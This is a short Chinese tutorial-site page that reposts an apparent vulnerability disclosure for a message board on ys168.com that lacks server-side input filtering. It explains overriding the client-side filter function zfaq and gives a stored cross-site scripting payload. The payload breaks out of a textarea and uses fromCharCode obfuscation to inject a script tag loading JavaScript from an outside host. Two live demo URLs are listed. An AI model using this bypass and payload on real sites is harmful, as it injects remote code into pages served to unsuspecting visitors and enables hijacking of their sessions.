来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 留言内容没有服务端过滤。重构zfaq 函数即可。function zfaq(str) { return str;}然后本地提交。内容代码为/textareaiframe/onload=javascript:write(String.fromCharCode(60,115,99,114,105,112,116,32......
|
留言内容没有服务端过滤。
重构zfaq 函数即可。 function zfaq(str) { return str; } 然后本地提交。 内容代码为 </textarea><iframe/onload=”javascript:write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,116,109,120,107,46,111,114,103,47,113,46,106,115,62,60,47,115,99,114,105,112,116,62))“> 漏洞证明: 演示地址: http://lover.ys168.com/ http://llxc.ys168.com/ 
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
